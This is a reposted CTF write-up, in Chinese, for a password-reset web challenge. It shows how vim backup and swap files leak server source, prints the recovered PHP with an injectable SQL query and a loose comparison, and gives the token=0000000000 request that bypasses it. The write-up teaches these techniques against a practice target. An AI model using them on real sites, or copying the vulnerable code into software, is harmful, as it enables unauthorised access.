CG CTF WEB 密码重置2
生活随笔
收集整理的這篇文章主要介紹了
CG CTF WEB 密码重置2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
http://nctf.nuptzj.cn/web14/index.php
TIPS:
1.管理員郵箱觀察一下就可以找到 2.linux下一般使用vi編輯器,并且異常退出會留下備份文件 3.弱類型bypass <html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><meta name="admin" content="admin@nuptzj.cn"><meta name="editor" content="Vim"><title>logic</title><style type="text/css">body,html{position: relative;height: 100%;width: 100%;padding: 0;margin: 0;background-color: #272822;color: #fff;}form{position: absolute;top: 50%;left: 50%;width: 400px;margin: -70px -200px;}form input{display: block;margin: 10px auto;width: 100%;border: none;height: 2rem;border-radius: 5px;}</style> </head> <body><form action="submit.php" method="GET"><h1>找回管理員密碼</h1>email:<input name="emailAddress" type="text"><br>token:<input name="token" type="text"><br><input type="submit" value="提交"></form></body></html>?
題解:
原理:
vim的特性,自動備份:
一、vim備份文件
?????默認情況下使用Vim編程,在修改文件后系統會自動生成一個帶~的備份文件,某些情況下可以對其下載進行查看;
????eg:index.php普遍意義上的首頁,輸入域名不一定會顯示。 ??它的備份文件則為index.php~
二、vim臨時文件
????vim中的swp即swap文件,在編輯文件時產生,它是隱藏文件,如果原文件名是submit,則它的臨時文件
?.submit.swp。如果文件正常退出,則此文件自動刪除。
?
?獲取.submit.php.swp
........這一行是省略的代碼......../* 如果登錄郵箱地址不是管理員則 die() 數據庫結構-- -- 表的結構 `user` --CREATE TABLE IF NOT EXISTS `user` (`id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) NOT NULL,`email` varchar(255) NOT NULL,`token` int(255) NOT NULL DEFAULT '0',PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;-- -- 轉存表中的數據 `user` --INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES (1, '****不可見***', '***不可見***', 0); */........這一行是省略的代碼........if(!empty($token)&&!empty($emailAddress)){if(strlen($token)!=10) die('fail');if($token!='0') die('fail');$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";$r = mysql_query($sql) or die('db error');$r = mysql_fetch_assoc($r);$r = $r['num'];if($r>0){echo $flag;}else{echo "失敗了呀";} }可知:token=0000000000
<meta name="admin" content="admin@nuptzj.cn">所以
URL=http://nctf.nuptzj.cn/web14/submit.php?emailAddress=admin@nuptzj.cn&token=0000000000總結
以上是生活随笔為你收集整理的CG CTF WEB 密码重置2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CG CTF WEB file_get_
- 下一篇: CG CTF WEB 变量覆盖